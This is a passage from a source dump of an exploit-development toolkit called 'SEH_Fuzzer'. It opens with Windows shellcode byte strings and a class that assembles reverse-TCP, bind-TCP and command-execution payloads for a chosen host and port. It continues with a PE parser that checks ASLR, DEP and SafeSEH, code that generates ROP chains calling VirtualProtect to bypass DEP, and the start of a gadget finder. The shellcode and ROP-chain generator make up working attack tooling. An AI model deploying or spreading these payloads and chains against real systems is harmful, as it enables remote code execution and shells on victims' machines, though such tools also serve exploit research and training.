 55 | BIND_TCP_FORMAT += "\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5"
 56 | BIND_TCP_FORMAT += "\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff"
 57 | BIND_TCP_FORMAT += "\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3"
 58 | 
 59 | WINCMD_FORMAT =  ""
 60 | WINCMD_FORMAT += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
 61 | WINCMD_FORMAT += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
 62 | WINCMD_FORMAT += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
 63 | WINCMD_FORMAT += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
 64 | WINCMD_FORMAT += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
 65 | WINCMD_FORMAT += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
 66 | WINCMD_FORMAT += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
 67 | WINCMD_FORMAT += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
 68 | WINCMD_FORMAT += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
 69 | WINCMD_FORMAT += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
 70 | WINCMD_FORMAT += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
 71 | WINCMD_FORMAT += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
 72 | WINCMD_FORMAT += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
 73 | WINCMD_FORMAT += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
 74 | WINCMD_FORMAT += "\xff\xd5%s\x00"
 75 | 
 76 | def getPythonCode(code):
 77 |     codes = "shellcode = \""
 78 |     for c in code:
 79 |         cc = hex(ord(c))
 80 |         codes += "\\x0" + cc[2:] if len(cc)<4 else "\\x" + cc[2:]
 81 |     codes += "\""
 82 |     return codes
 83 | 
 84 | class ShellCode(object):
 85 |     def __init__(self, args={"type":"reverse_tcp", "host":"127.0.0.1", "port":"1234"}):
 86 |         self.args = args
 87 | 
 88 |     def getHost(self):
 89 |         if self.args["type"] == "reverse_tcp":
 90 |             return "".join(map(lambda addr: struct.pack(">B", int(addr)), self.args["host"].split(".")))
 91 |         else:
 92 |             return None
 93 | 
 94 |     def getPort(self):
 95 |         if (self.args["type"] == "reverse_tcp") or (self.args["type"] == "bind_tcp"):
 96 |             return struct.pack(">H", self.args["port"])
 97 |         else:
 98 |             return None
 99 | 
100 |     def getCmd(self):
101 |         if self.args["type"] == "win_cmd":
102 |             return self.args["cmd"]
103 |         else:
104 |             return None
105 | 
106 |     def getShellCode(self):
107 |         if self.args["type"] == "reverse_tcp":
108 |             return REVERSE_TCP_FORMAT % (self.getHost(), self.getPort())
109 |         elif self.args["type"] == "bind_tcp":
110 |             return BIND_TCP_FORMAT % (self.getPort())
111 |         elif self.args["type"] == "win_cmd":
112 |             return WINCMD_FORMAT % (self.getCmd())
113 |         else:
114 |             return None
115 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/PE.py:
--------------------------------------------------------------------------------
  1 | import pefile
  2 | from capstone import *
  3 | 
  4 | '''
  5 | 	Windows PE file arch code.
  6 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#machine_types
  7 | '''
  8 | class ArchFlag:
  9 | 	IMAGE_FILE_MACHINE_UNKNOWN	= 0x0
 10 | 	IMAGE_FILE_MACHINE_AMD64 	= 0x8664
 11 | 	IMAGE_FILE_MACHINE_I386  	= 0x14c
 12 | 	IMAGE_FILE_MACHINE_IA64  	= 0x200
 13 | 	
 14 | '''
 15 | 	Get PE file characteristics.
 16 | 	Can grad some characteristics of PE file.
 17 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#characteristics
 18 | '''
 19 | class FileHeaderCharacteristicsFlag:
 20 | 	IMAGE_FILE_RELOCS_STRIPPED = 0x1
 21 | 	IMAGE_FILE_32BIT_MACHINE   = 0x100
 22 | 	IMAGE_FILE_SYSTEM		   = 0x1000
 23 | 	IMAGE_FILE_DLL 			   = 0x2000
 24 | 	
 25 | '''
 26 | 	Get file bits.
 27 | '''
 28 | class MagicFlag:
 29 | 	PE32 	 = 0x10b	# for 32bit
 30 | 	PE32plus = 0x20b	# for 64bit
 31 | 
 32 | class PESecurityCheck:
 33 |   IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
 34 |   IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
 35 |   IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400
 36 |   IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000
 37 | 	
 38 | '''
 39 | 	Get DLL characteristics.
 40 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#dll_characteristics
 41 | '''
 42 | class DllCharacteristicsFlag:
 43 | 	IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x40
 44 | 	IMAGE_DLLCHARACTERISTICS_NX_COMPAT    = 0x100
 45 | 	IMAGE_DLLCHARACTERISTICS_NO_SEH      = 0x400
 46 | 	
 47 | '''
 48 | 	Section Flag Definition.
 49 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#section_flags
 50 | '''
 51 | class SectionFlag:
 52 | 	IMAGE_SCN_MEM_EXECUTE = 0x20000000
 53 | 	IMAGE_SCN_MEM_READ = 0x40000000
 54 | 	IMAGE_SCN_MEM_WRITE = 0x80000000
 55 | 
 56 | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
 57 | 	
 58 | '''
 59 | 	PE parse error exception, will add a message about error.
 60 | '''
 61 | class PEError(Exception):
 62 | 	def __init__(self, message="Parse PE file fail"):
 63 | 		self.message = message
 64 | 		
 65 | 	def __str__(self):
 66 | 		return repr(self.message)
 67 | 	
 68 | class PE(object):
 69 | 	def __init__(self, exe_path):
 70 | 		self.__name = exe_path
 71 | 		self.__parser = None
 72 | 		self.__format = "PE"
 73 | 		try:
 74 | 			self.__parser = pefile.PE(exe_path, fast_load=True)
 75 | 		except:
 76 | 			self.__parser = None
 77 | 			raise PEError("[-] Open %s fail." % (self.Name))
 78 | 		
 79 | 		self.Arch = self.__parser.FILE_HEADER.Machine
 80 | 		self.__type = "dll" if self.__parser.FILE_HEADER.Characteristics & FileHeaderCharacteristicsFlag.IMAGE_FILE_DLL else "exe"
 81 | 		
 82 | 		if self.__type == "exe" and (self.__parser.FILE_HEADER.Characteristics & FileHeaderCharacteristicsFlag.IMAGE_FILE_RELOCS_STRIPPED):
 83 | 			self.__rebase = False
 84 | 		elif self.__type == "dll" and not (self.__parser.OPTIONAL_HEADER.DllCharacteristics & DllCharacteristicsFlag.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE):
 85 | 			self.__rebase = False
 86 | 		else:
 87 | 			self.__rebase = True
 88 | 		
 89 | 		if self.__parser.OPTIONAL_HEADER.Magic & MagicFlag.PE32:
 90 | 			self.__bits = 32
 91 | 			self.__bitMode = CS_MODE_32
 92 | 		elif self.__parser.OPTIONAL_HEADER.Magic & MagicFlag.PE32plus:
 93 | 			self.__bits = 64
 94 | 			self.__bitMode = CS_MODE_64
 95 | 
 96 | 		self.__base = self.__parser.OPTIONAL_HEADER.ImageBase
 97 | 		self.__basesize = self.__parser.OPTIONAL_HEADER.SizeOfImage
 98 | 
 99 | 		# check protection
100 | 		self.__aslr    = True if (self.__parser.OPTIONAL_HEADER.DllCharacteristics & PESecurityCheck.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0 else False
101 | 		self.__nx      = True if (self.__parser.OPTIONAL_HEADER.DllCharacteristics & PESecurityCheck.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) != 0 else False
102 | 		self.__cfg	   = True if (self.__parser.OPTIONAL_HEADER.DllCharacteristics & PESecurityCheck.IMAGE_DLLCHARACTERISTICS_GUARD_CF) != 0 else False
103 | 
104 | 		if ( (self.__parser.OPTIONAL_HEADER.DllCharacteristics & PESecurityCheck.IMAGE_DLLCHARACTERISTICS_NO_SEH) != 0 ) and (self.__parser.OPTIONAL_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress != 0) and (self.__parser.OPTIONAL_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].Size != 0):
105 | 			self.__safeseh = True
106 | 		else:
107 | 			self.__safeseh = False
108 | 		
109 | 		self.__entryPoint = self.__parser.OPTIONAL_HEADER.ImageBase + self.__parser.OPTIONAL_HEADER.AddressOfEntryPoint
110 | 		
111 | 		self.__dataSections = None
112 | 		self.__execSections = None
113 | 
114 | 		self.__getDataSections()
115 | 		self.__getExecSections()
116 | 		
117 | 		self.__IAT = {}
118 | 		self.__EAT = {}
119 | 		
120 | 		self.__parser.parse_data_directories()
121 | 		self.__getEAT()
122 | 		self.__getIAT()
123 | 		
124 | 		self.__parser.close()
125 | 		
126 | 	# Get writable data section.
127 | 	def __getDataSections(self):
128 | 		dataSections = []
129 | 		for section in self.__parser.sections:
130 | 			if section.Characteristics & SectionFlag.IMAGE_SCN_MEM_WRITE:
131 | 				dataSections.append({
132 | 					"name" : section.Name,
133 | 					"offset" : section.PointerToRawData,
134 | 					"size" : section.SizeOfRawData,
135 | 					"vaddr" : section.VirtualAddress + self.__parser.OPTIONAL_HEADER.ImageBase,
136 | 					"code" : str(section.get_data())
137 | 				})
138 | 		self.__dataSections = dataSections
139 | 		
140 | 	# Get executable section for ROP gadget.
141 | 	def __getExecSections(self):
142 | 		execSections = []
143 | 		for section in self.__parser.sections:
144 | 			if section.Characteristics & SectionFlag.IMAGE_SCN_MEM_EXECUTE:
145 | 				execSections.append({
146 | 					"name" : section.Name,
147 | 					"offset" : section.PointerToRawData,
148 | 					"size" : section.SizeOfRawData,
149 | 					"vaddr" : section.VirtualAddress + self.__parser.OPTIONAL_HEADER.ImageBase,
150 | 					"code" : bytes(section.get_data())
151 | 				})
152 | 		self.__execSections = execSections
153 | 
154 | 	# Get EAT(Export Address Table).
155 | 	def __getEAT(self):	
156 | 		try:
157 | 			for symbol in self.__parser.DIRECTORY_ENTRY_EXPORT.symbols:
158 | 				self.__EAT.update({symbol.name : self.__parser.OPTIONAL_HEADER.ImageBase + symbol.address})
159 | 		# No Export symbols.
160 | 		except AttributeError:
161 | 			pass
162 | 
163 | 	# Get IAT(Import address Table).
164 | 	def __getIAT(self):
165 | 		try:
166 | 			for entry in self.__parser.DIRECTORY_ENTRY_IMPORT:
167 | 				# print entry.dll
168 | 				for symbol in entry.imports:
169 | 				# print "[*] 0x%08x %s." % (symbol.address, symbol.name)
170 | 					self.__IAT.update({symbol.name : symbol.address})
171 | 		# No Import symbols.
172 | 		except AttributeError:
173 | 			pass
174 | 
175 | 	'''
176 | 		Propertys of PE file.
177 | 	'''
178 | 		
179 | 	@property
180 | 	def Arch(self):
181 | 		return self.__Arch
182 | 	
183 | 	@Arch.setter
184 | 	def Arch(self, flag):
185 | 		self.__Arch = { 
186 | 				 ArchFlag.IMAGE_FILE_MACHINE_UNKNOWN : "All",
187 | 				 ArchFlag.IMAGE_FILE_MACHINE_AMD64 	 : "amd64",
188 | 				 ArchFlag.IMAGE_FILE_MACHINE_I386  	 : "intel",
189 | 				 ArchFlag.IMAGE_FILE_MACHINE_IA64  	 : "ia64"
190 | 				}.get(flag, "unknow")
191 | 				
192 | 		if self.__Arch == "unknow":
193 | 			raise PEError("[-] %s is not arch." % (self.Name))
194 | 				 
195 | 		self.__ArchMode = {
196 | 					ArchFlag.IMAGE_FILE_MACHINE_UNKNOWN : CS_ARCH_ALL,
197 | 					ArchFlag.IMAGE_FILE_MACHINE_AMD64 	 : CS_ARCH_X86,
198 | 					ArchFlag.IMAGE_FILE_MACHINE_I386  	 :  CS_ARCH_X86,
199 | 					ArchFlag.IMAGE_FILE_MACHINE_IA64  	 :  CS_ARCH_X86
200 | 				}.get(flag, None)
201 | 				
202 | 		if self.__ArchMode is None:
203 | 			raise PEError("[-] %s is not support." % (self.Name))
204 | 				
205 | 	@property
206 | 	def ArchMode(self):
207 | 		return self.__ArchMode
208 | 
209 | 	@property
210 | 	def ASLR(self):
211 | 		return self.__aslr
212 | 
213 | 	@property
214 | 	def Base(self):
215 | 		return self.__base
216 | 
217 | 	@property
218 | 	def BaseSize(self):
219 | 		return self.__basesize
220 | 	
221 | 	@property
222 | 	def Bits(self):
223 | 		return self.__bits
224 | 		
225 | 	@property
226 | 	def BitsMode(self):
227 | 		return self.__bitMode
228 | 
229 | 	@property
230 | 	def CFG(self):
231 | 		return self.__cfg
232 | 	
233 | 	@property
234 | 	def DataSections(self):
235 | 		return self.__dataSections
236 | 	
237 | 	@property
238 | 	def EAT(self):
239 | 		return self.__EAT
240 | 
241 | 	@property
242 | 	def ExecSections(self):
243 | 		return self.__execSections
244 | 		
245 | 	@property
246 | 	def EntryPoint(self):
247 | 		return self.__entryPoint
248 | 	
249 | 	@property
250 | 	def Format(self):
251 | 		return self.__format
252 | 
253 | 	@property
254 | 	def IAT(self):
255 | 		return self.__IAT
256 | 
257 | 	@property
258 | 	def Name(self):
259 | 		return self.__name
260 | 
261 | 	@property
262 | 	def NX(self):
263 | 		return self.__nx
264 | 
265 | 	@property 
266 | 	def Rebase(self):
267 | 		return self.__rebase
268 | 		
269 | 	@property
270 | 	def SafeSEH(self):
271 | 		return self.__safeseh
272 | 	
273 | 	@property
274 | 	def Type(self):
275 | 		return self.__type
276 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/util.py:
--------------------------------------------------------------------------------
  1 | import struct
  2 | import string
  3 | import os
  4 | import math
  5 | import random
  6 | 
  7 | def p32(data):
  8 | 	return struct.pack("<I", data)
  9 | 	
 10 | def pStr(word, size=4):
 11 |     if len(word)>size:
 12 |         return None
 13 |     value = 0
 14 |     for c in word[::-1]:
 15 |         value = value*16*16 + ord(c)
 16 |     return value
 17 | 
 18 | def pattern_create(max_length=5000, append=False):
 19 | 	charset1 = string.ascii_uppercase
 20 | 	charset2 = string.ascii_lowercase
 21 | 	charset3 = string.digits
 22 | 	if append:
 23 | 		charset3 += ",.;+=-_!&()#@({})[]%"
 24 | 	pattern = []
 25 | 	
 26 | 	while len(pattern)<max_length:
 27 | 		for char_1 in charset1:
 28 | 			for char_2 in charset2:
 29 | 				for char_3 in charset3:
 30 | 					if len(pattern) < max_length:
 31 | 						pattern.append(char_1)
 32 | 					if len(pattern) < max_length:
 33 | 						pattern.append(char_2)
 34 | 					if len(pattern) < max_length:
 35 | 						pattern.append(char_3)
 36 | 						
 37 | 	return "".join(pattern)
 38 | 
 39 | def pattern_find(pattern, max_length=5000, append=False):
 40 | 	pattern = p32(pattern)
 41 | 	origin_pattern = pattern_create(max_length)
 42 | 	offset = origin_pattern.find(pattern)
 43 | 	return offset
 44 | 
 45 | # search function address by IAT
 46 | def searchFuncByIAT(IATs, func_name="VirtualProtect"):
 47 | 	for module in IATs.keys():
 48 | 		for func, address in IATs[module].items():
 49 | 			if func == func_name:
 50 | 				return address
 51 | 	return 0
 52 | 
 53 | # search writable address and add offset to prevent null byte and newline
 54 | def searchWritableAddress(wriatableAddress):
 55 | 	choose = random.randint(0, len(wriatableAddress)-1)
 56 | 	counter = 0
 57 | 	for address in wriatableAddress.keys():
 58 | 		if counter == choose:
 59 | 			return address
 60 | 		else:
 61 | 			counter += 1
 62 | 
 63 | def searchGadget(gadgets, gadget_type, gadget_pattern):
 64 | 	if gadget_type not in gadgets.keys():
 65 | 		return None
 66 | 	shortest_gadget = None
 67 | 	for vaddr in gadgets[gadget_type].keys():
 68 | 		if gadgets[gadget_type][vaddr].startswith(gadget_pattern):
 69 | 			if shortest_gadget is None or len(shortest_gadget[1])>=len(gadgets[gadget_type][vaddr]):
 70 | 				shortest_gadget = (vaddr, gadgets[gadget_type][vaddr])
 71 | 	return shortest_gadget
 72 | 
 73 | def neg(word):
 74 | 	return 0x100000000 - word
 75 | 
 76 | def getPickupChain(collection, target_register, fptr):
 77 | 	pickup_chain = []
 78 | 	REGISTER = ["eax", "ebx", "ecx", "edx", "esi", "edi", "ebp"]
 79 | 	# Check whether can do function call.
 80 | 	if fptr is None or fptr == 0:
 81 | 		return pickup_chain
 82 | 
 83 | 	pickups = [ types for types in collection.keys() if types.startswith("pickup")]
 84 | 
 85 | 	'''
 86 | 		pop source_register ; ret
 87 | 		fptr
 88 | 		mov target_register, dword ptr [source_register] ; ret
 89 | 	'''
 90 | 	for types in pickups:
 91 | 		if types.startswith("pickup" + target_register):
 92 | 			pickup_gadget = searchGadget(collection, types, "mov")
 93 | 			source_register = types[-3:]
 94 | 			pop_gadget = searchGadget(collection, "pop", "pop " + source_register)
 95 | 			if (pickup_gadget is not None) and (pop_gadget is not None):
 96 | 				pickup_chain.append((pop_gadget[0], pop_gadget[1]))
 97 | 				pickup_chain.append((fptr, "ptr to VirtualProtect"))
 98 | 				pickup_chain.append((pickup_gadget[0], pickup_gadget[1]))
 99 | 				return pickup_chain
100 | 
101 | 	'''
102 | 		pop temp_register ; ret
103 | 		fptr
104 | 		mov source_register, dword ptr [temp_register] ; ret
105 | 		mov target_register, source_register ; ret
106 | 	'''
107 | 	for source_register in REGISTER:
108 | 		for types in pickups:
109 | 			if types.startswith("pickup" + source_register):
110 | 				temp_register = types[-3:]
111 | 				pop_temp_gadget = searchGadget(collection, "pop", "pop " + temp_register)
112 | 				pickup_gadget = searchGadget(collection, types, "mov")
113 | 				mov_gadget = searchGadget(collection, "mov"+target_register+source_register, "xchg") or searchGadget(collection, "mov"+target_register+source_register, "mov")
114 | 				if (pop_temp_gadget is not None) and (pickup_gadget is not None) and (mov_gadget is not None):
115 | 					pickup_chain.append((pop_temp_gadget[0], pop_temp_gadget[1]))
116 | 					pickup_chain.append((fptr, "ptr to VirtualProtect"))
117 | 					pickup_chain.append((pickup_gadget[0], pickup_gadget[1]))
118 | 					pickup_chain.append((mov_gadget[0], mov_gadget[1]))
119 | 					return pickup_chain
120 | 
121 | 	'''
122 | 		pop temp1_register ; ret
123 | 		fptr
124 | 		mov temp2_register, dword ptr [temp1_register] ; ret
125 | 		mov temp3_register, temp2_register ; ret
126 | 		xor target_register, target_register ; ret
127 | 		add target_register, temp3_register ; ret
128 | 	'''
129 | 	for add_addr, add_text in collection["add"].items():
130 | 		if add_text.startswith("add " + target_register):
131 | 			pattern = add_text.split(" ; ")[0]
132 | 			temp3_register = pattern[-3:]
133 | 			add_gadget = searchGadget(collection, "add", "add " + target_register + ", " + temp3_register)
134 | 			xor_gadget = searchGadget(collection, "clear", "xor " + target_register)
135 | 			if (add_gadget is not None) and  (xor_gadget is not None):
136 | 				for mov_type in collection.keys():
137 | 					if (mov_type.startswith("mov"+temp3_register)):
138 | 						temp2_register = mov_type[-3:]
139 | 						mov_gadget = searchGadget(collection, mov_type, "xchg") or searchGadget(collection, mov_type, "mov")
140 | 						if mov_gadget is not None:
141 | 							for pickup_type in pickups:
142 | 								if pickup_type.startswith("pickup"+temp2_register):
143 | 									temp1_register = pickup_type[-3:]
144 | 									pickup_gadget = searchGadget(collection, pickup_type, "mov")
145 | 									pop_gadget = searchGadget(collection, "pop", "pop " + temp1_register)
146 | 									if (pickup_gadget is not None) and (pop_gadget is not None):
147 | 										pickup_chain.append((pop_gadget[0], pop_gadget[1]))
148 | 										pickup_chain.append((fptr, "ptr to VirtualProtect"))
149 | 										pickup_chain.append((pickup_gadget[0], pickup_gadget[1]))
150 | 										pickup_chain.append((mov_gadget[0], mov_gadget[1]))
151 | 										pickup_chain.append((xor_gadget[0], xor_gadget[1]))
152 | 										pickup_chain.append((add_gadget[0], add_gadget[1]))
153 | 										return pickup_chain
154 | 
155 | 	return pickup_chain
156 | 
157 | '''
158 | +-------------------------+
159 | | virtualprotect strategy |
160 | +-------------------------+
161 | pushad
162 | 	+-----+--------------------------+--------------------------+
163 | 	| Reg | method1					 | method2					|
164 | 	+-----+--------------------------+--------------------------+
165 | 	| edi | ptr to ret 				 | ptr to ret 				|
166 | 	+-----+--------------------------+--------------------------+
167 | 	| esi |	ptr to &virtualprotect() | ptr to jmp [eax]			|
168 | 	+-----+--------------------------+--------------------------+
169 | 	| ebp | ptr to jmp esp			 | pop 4 bytes 				|
170 | 	+-----+--------------------------+--------------------------+
171 | 	| esp | arg1					 | arg1						|
172 | 	+-----+--------------------------+--------------------------+
173 | 	| ebx | arg2					 | arg2						|
174 | 	+-----+--------------------------+--------------------------+
175 | 	| edx | arg3					 | arg3						|
176 | 	+-----+--------------------------+--------------------------+
177 | 	| ecx | arg4					 | arg4						|
178 | 	+-----+--------------------------+--------------------------+
179 | 	| eax | nop * 4					 | ptr to &virtualprotect() |
180 | 	+-----+--------------------------+--------------------------+
181 | '''	
182 | # Generate a rop chain to bypass DEP.
183 | def generate_ropchain(collection, IATs, wAddrs):
184 | 	virtualprotect = [ ("esi", "func"), ("ebp", "jmp"), ("ebx", "size"), ("edx", "rwx"),
185 | 	("ecx", "waddr"), ("edi", "nop"), ("eax", "nopcode"), ("all", "pushad") ]
186 | 	rop_chain = []
187 | 	Found_Gadget = True
188 | 	Need_Fix = None
189 | 	for step in virtualprotect:
190 | 		register, purpose = step
191 | 
192 | 		if purpose == "func":
193 | 			virtualprotectPtr = searchFuncByIAT(IATs, "VirtualProtect")
194 | 			pickup_chain = getPickupChain(collection, register, virtualprotectPtr)
195 | 			if len(pickup_chain)>0:
196 | 				rop_chain.extend(pickup_chain)
197 | 
198 | 			else:
199 | 				Found_Gadget = False
200 | 		elif purpose == "jmp":
201 | 			gadget = searchGadget(collection, "pop", "pop " + register)
202 | 			addr = searchGadget(collection, "jmpesp", "jmp esp")
203 | 			if addr is None:
204 | 				addr = searchGadget(collection, "jmpesp", "push esp ; ret")
205 | 				if addr is None:
206 | 					Found_Gadget = False
207 | 				else:
208 | 					addr = addr[0]
209 | 			else:
210 | 				addr = addr[0]
211 | 			
212 | 			if gadget is not None and Found_Gadget:
213 | 				print "0x%08x: %s" % (gadget[0], gadget[1])
214 | 				print "%s: 0x%08x" % ("ptr to jmp esp", addr)
215 | 				rop_chain.append((gadget[0], gadget[1]))
216 | 				rop_chain.append((addr, "ptr to jmp esp"))
217 | 			else:
218 | 				Found_Gadget = False
219 | 
220 | 
221 | 		elif purpose == "size":
222 | 			gadget = searchGadget(collection, "pop", "pop "+register)
223 | 			neg_gadget = searchGadget(collection, "neg", "neg "+register)
224 | 			if (gadget is None) or (neg_gadget is None):
225 | 				gadget = searchGadget(collection, "pop", "pop eax")
226 | 				neg_gadget = searchGadget(collection, "neg", "neg eax")
227 | 				# Since ebx will be zero(need check).
228 | 				mov_gadget = searchGadget(collection, "add", "add "+register+", eax")
229 | 				if (gadget is None) or (neg_gadget is None) or (mov_gadget is None):
230 | 					Found_Gadget = False
231 | 				else:
232 | 					rop_chain.append((gadget[0], gadget[1]))
233 | 					rop_chain.append((neg(0x201), "-0x201"))
234 | 					rop_chain.append((neg_gadget[0], neg_gadget[1]))
235 | 					rop_chain.append((mov_gadget[0], mov_gadget[1]))
236 | 					# Fix side effect (mov eax, [esp + 0xc])
237 | 					check_fix_list = mov_gadget[1].split(" ; ")
238 | 					for pattern in check_fix_list:
239 | 						if pattern.startswith("mov eax, dword ptr [esp +"):
240 | 							pattern = pattern.split("+")[-1]
241 | 							pattern = pattern.replace("]", "")
242 | 							try:
243 | 								Need_Fix = int(pattern)
244 | 							except ValueError:
245 | 								try:
246 | 									Need_Fix = int(pattern, base=16)
247 | 								except:
248 | 									Need_Fix = None
249 | 							except:
250 | 								Need_Fix = None
251 | 					if Need_Fix is not None:
252 | 						Need_Fix = len(rop_chain) -1 + int(math.ceil(Need_Fix/4))
253 | 
254 | 			else:
255 | 				rop_chain.append((gadget[0], gadget[1]))
256 | 				rop_chain.append((neg(0x201), "dwsize"))
257 | 				rop_chain.append((neg_gadget[0], neg_gadget[1]))
258 | 
259 | 		elif purpose == "rwx":
260 | 			gadget = searchGadget(collection, "pop", "pop " + register)
261 | 			neg_gadget = searchGadget(collection, "neg", "neg " + register)
262 | 			if (gadget is None) or (neg_gadget is None):
263 | 				gadget = searchGadget(collection, "clear", "xor " + register + ", " + register)
264 | 				inc_gadget = searchGadget(collection, "inc", "inc " + register)
265 | 				if (gadget is None) or (inc_gadget is None):
266 | 					Found_Gadget = False
267 | 				else:
268 | 					rop_chain.append((gadget[0], gadget[1]))
269 | 					for i in xrange(0x40):
270 | 						rop_chain.append((inc_gadget[0], inc_gadget[1]))
271 | 
272 | 			else:
273 | 				rop_chain.append((gadget[0], gadget[1]))
274 | 				rop_chain.append((neg(0x40), "-0x40"))
275 | 				rop_chain.append((neg_gadget[0], neg_gadget[1]))
276 | 			
277 | 		elif purpose == "waddr":
278 | 			gadget = searchGadget(collection, "pop", "pop " + register)
279 | 			addr = searchWritableAddress(wAddrs)
280 | 			if (addr is None) or (gadget is None):
281 | 				Found_Gadget = False
282 | 			else:
283 | 				rop_chain.append((gadget[0], gadget[1]))
284 | 				rop_chain.append((addr, "writable address"))
285 | 				
286 | 		elif purpose == "nop":
287 | 			gadget = searchGadget(collection, "pop", "pop " + register)
288 | 			nop_gadget = searchGadget(collection, "nop", "ret") or searchGadget(collection, "nop", "nop")
289 | 			if (gadget is None) or (nop_gadget is None):
290 | 				Found_Gadget = False
291 | 			else:
292 | 				rop_chain.append((gadget[0], gadget[1]))
293 | 				rop_chain.append((nop_gadget[0], "ptr to [nop] ret"))
294 | 		
295 | 		elif purpose == "nopcode":
296 | 			gadget = searchGadget(collection, "pop", "pop " + register)
297 | 			if gadget is None:
298 | 				Found_Gadget = False
299 | 			else:
300 | 				rop_chain.append((gadget[0], gadget[1]))
301 | 				rop_chain.append((0x90909090, "nop code"))
302 | 
303 | 		elif purpose == "pushad":
304 | 			gadget = searchGadget(collection, "pushad", "pushal") or searchGadget(collection, "pushad", "pushad")
305 | 			if gadget is None:
306 | 				Found_Gadget = False
307 | 			else:
308 | 				rop_chain.append((gadget[0], gadget[1]))
309 | 
310 | 		if (Need_Fix is not None) and len(rop_chain)>=Need_Fix:
311 | 			gadget = searchGadget(collection, "addnum", "add esp, 4 ; ret")
312 | 			addr = searchWritableAddress(wAddrs)
313 | 			if (gadget is None) or (addr is None):
314 | 				Found_Gadget = False
315 | 			else:
316 | 				rop_chain.insert(Need_Fix, (gadget[0], gadget[1]))
317 | 				rop_chain.insert(Need_Fix+1, (addr, "gargabe"))
318 | 				Need_Fix = None
319 | 
320 | 		if not Found_Gadget:
321 | 			break
322 | 			
323 | 	return rop_chain


--------------------------------------------------------------------------------
/SEH_Fuzzer/Gadget.py:
--------------------------------------------------------------------------------
  1 | from PE import *
  2 | from util import *
  3 | import sys
  4 | from capstone import *
  5 | import re
  6 | 
  7 | MAX_DEPTH = 10
  8 | PATTERN		 = 0
  9 | PATTERN_SIZE = 1
 10 | CODE_SIZE	 = 2
 11 | OPCODE		 = 3
 12 | 
 13 | RetGadgetFormat = [
 14 | 	[b"\xc3", 1, 1, "ret"],			 # ret(near)
 15 | 	[b"\xcb", 1, 1, "ret"],			 # ret(far)
 16 | 	[b"\xc2[\x00-\xff]{2}", 3, 1, "ret"],  # ret imm16(near)
 17 | 	[b"\xca[\x00-\xff]{2}", 3, 1, "ret"],  # ret imm16(far)
 18 | 	]
 19 | 	
 20 | SysGadgetFormat = [
 21 | 	[b"\x0f\x05", 2, 1, "syscall"],		 # syscall
 22 | 	[b"\xcd\x80", 2, 1, "int 0x80"]		 # int 0x80
 23 | 	]
 24 | 
 25 | JmpGadgetFormat = [
 26 | 	[b"\xff[\x20\x21\x22\x23\x26\x27]{1}", 2, 1, "jmp e"],     # jmp  [register]
 27 | 	[b"\xff[\xe0\xe1\xe2\xe3\xe4\xe6\xe7]{1}", 2, 1, "jmp e"], # jmp  [register]
 28 | 	[b"\xff[\x10\x11\x12\x13\x16\x17]{1}", 2, 1, "jmp e"],     # jmp  [register]
 29 | 	[b"\xff[\xd0\xd1\xd2\xd3\xd4\xd6\xd7]{1}", 2, 1, "call e"],  # call [register]
 30 | 	]
 31 | 	
 32 | '''
 33 | 	filiter gadget whether contain newline or nullbyte
 34 | '''
 35 | def gadget_filter(gadget):
 36 | 	return False if ("\x0a" in p32(gadget)) or ( "\x00" in p32(gadget)) else True
 37 | 	
 38 | class Gadget(dict):
 39 | 	def __init__(self, pe):
 40 | 		self.__pe = pe
 41 | 		self.__disassembler = Cs(pe.ArchMode, pe.BitsMode)
 42 | 		self.__execSections = self.__pe.ExecSections
 43 | 		self.__dataSections = self.__pe.DataSections
 44 | 		
 45 | 		self.__retGadgets = self.collect_gadgets(RetGadgetFormat)
 46 | 		self.__sysGadgets = self.collect_gadgets(SysGadgetFormat)
 47 | 		self.__jmpGadgets = self.findJmp(JmpGadgetFormat)
 48 | 
 49 | 	def findJmp(self, GadgetFormat):
 50 | 		Gadgets = []
 51 | 		for section in self.__execSections:
 52 | 			code = section["code"]
